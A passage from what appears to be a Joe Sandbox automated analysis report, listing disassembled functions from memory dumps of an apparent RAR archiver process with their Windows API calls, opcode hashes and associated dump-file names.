                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4044681568-0
                                                                                                                                                                                                                                • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                                                                                • Instruction ID: 0f1195f79d6105a8e419083af09ae1d7d58386488bdc68ff95fbb53798069de5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A01D000E0E2D246FB28B7B558A63B956A38F91310F4042F8E57E8A3DBFD1D680F8351
                                                                                                                                                                                                                                Function 00007FF6FAA42440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                • Instruction ID: 232aa6a7daf0087b6b908f6c7d1cfb061d3db0f16488db4bee4d2b4138aa4be6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5101C022A1864292EB649B29F4803782360EB447B8F244372E63D821F9EF7DD59FC700
                                                                                                                                                                                                                                Function 00007FF6FAA430C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000800,00007FF6FAA4305D,?,?,?,?,?,?,?,?,00007FF6FAA54126,?,?,?,?,00000800), ref: 00007FF6FAA430F0
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6FAA54126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6FAA43119
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                • Instruction ID: c00d515ca9675a91954ba424e01f7fa4d9d9aae0ed7c26d5a1c20ab65734cec9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3F04F31B18A8146EB609B68F5553AA6290BB4C7D4F400575EAACC37E9EF6CD58A8B00
                                                                                                                                                                                                                                Function 00007FF6FAA6B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1175261203-0
                                                                                                                                                                                                                                • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                • Instruction ID: 03970ef0ba41adcf51f0fe302d0b98a9c9042a1b8c5e9f2fe186f033466dd68a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF01262B2858196F7709B20E8153F662A4BF9C7C4F804071E9DDC27D9FF2CD65A8B10
                                                                                                                                                                                                                                Function 00007FF6FAA6BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1231390398-0
                                                                                                                                                                                                                                • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                • Instruction ID: d6df291164dc82e41fecab5a11594546793d2b1c45a13bc7fc6917b48470c626
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74E02B61B7445147DBD85719C491FA91390AF54BC0F802035F41BC3B94FD1DC4598B00
                                                                                                                                                                                                                                Function 00007FF6FAA84A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                • Instruction ID: 8b8f44d1eb98a6863e1fb0a2743f26f1ce7739a73a2eb88b05d0dd05128f3463
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE08C60E1E28343FF48ABF2A84417513906F98B80F0440B4DD3ECA3D2FE2CA89B4204
                                                                                                                                                                                                                                Function 00007FF6FAA671FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 81a0c4cc47bb6f8769579c9a8c642551102bf2f778f9bea038dbf468d6b78107
                                                                                                                                                                                                                                • Instruction ID: f9ea6df1e6f33821619d4372e9df54faeb670f2d77df6e6a535e2c67ec5b675e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81a0c4cc47bb6f8769579c9a8c642551102bf2f778f9bea038dbf468d6b78107
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5E1D821A2868241FB209A28D4647FE6771FF42B88F4401B5DD6D8B7DAFE2D944FCB10
                                                                                                                                                                                                                                Function 00007FF6FAA272C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 41fee4be509a7d6b9010376eb7811afad9251bec75b598907398f09de2282cd6
                                                                                                                                                                                                                                • Instruction ID: 522662e3b5745bf327a3fe8641aace16243c600525d4d44bc59789036f6f50c1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41fee4be509a7d6b9010376eb7811afad9251bec75b598907398f09de2282cd6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B514672528BD194E7009F24E8441ED37A8FB44F88F18427AEA984B7DAEF395166C321
                                                                                                                                                                                                                                Function 00007FF6FAA8231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                • Instruction ID: a808cb033ddaaa7eec052de590ff7cb05f19cd6988d52c892f982c5e74b09fb9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3418D21A0D68382FB69DB15D95027823A1EF84B40F0064B5D93ECB6D9FE3DE84F8740
                                                                                                                                                                                                                                Function 00007FF6FAA34D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3253501508-0
                                                                                                                                                                                                                                • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                • Instruction ID: 9588906b506fdfba2e0ff6962e323779d37f4d8ae233d2226637e053b7751e8d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5401961160C74286EB50EB16A4021BE5660BF85BD5F580472EEEDC77E9EE3FD45B8304
                                                                                                                                                                                                                                Function 00007FF6FAA84B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                • Instruction ID: e6fb9c551687d31fcfdbc341b859a037416eca7d11e8aa20e78ce5fb57424d6a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9016250E0D6C343FF6897669A4427A53905F94BD4F4882B1ED3EC62D6FD2CE44B4200
                                                                                                                                                                                                                                Function 00007FF6FAA6A924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
